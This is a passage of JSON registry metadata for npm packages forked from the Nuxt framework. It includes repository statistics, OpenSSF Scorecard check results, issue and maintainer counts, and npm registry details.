follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32304464,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-26T09:34:17.070Z","status":"ssl_error","status_checked_at":"2026-04-26T09:34:00.993Z","response_time":129,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:05.167Z","dependent_packages_count":0,"downloads":801,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.063441759567027,"dependent_packages_count":36.25204172285812,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.657741741212572},"purl":"pkg:npm/%40rsnuxt/vue-renderer","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@rsnuxt/vue-renderer","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@rsnuxt/vue-renderer","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@rsnuxt/vue-renderer/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fvue-renderer/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fvue-renderer/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fvue-renderer/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fvue-renderer/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fvue-renderer/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fvue-renderer/codemeta","maintainers":[{"uuid":"vincent.bian","login":"vincent.bian","name":null,"email":"macisi528@gmail.com","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~vincent.bian","role":null,"created_at":"2025-02-11T09:42:23.527Z","updated_at":"2025-02-11T09:42:23.527Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vincent.bian/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":6014314,"name":"@johnjenkins/nuxt","ecosystem":"npm","description":"[![Nuxt banner](./.github/assets/banner.png)](https://nuxt.com)","homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"johnjenkins","versions_count":1,"first_release_published_at":"2023-01-28T12:59:34.643Z","latest_release_published_at":"2023-01-28T12:59:34.643Z","latest_release_number":"3.0.1","last_synced_at":"2026-05-11T01:23:07.217Z","created_at":"2023-01-30T00:13:26.124Z","updated_at":"2026-05-11T01:23:07.217Z","registry_url":"https://www.npmjs.com/package/@johnjenkins/nuxt","install_command":"npm install @johnjenkins/nuxt","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.0.1"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed 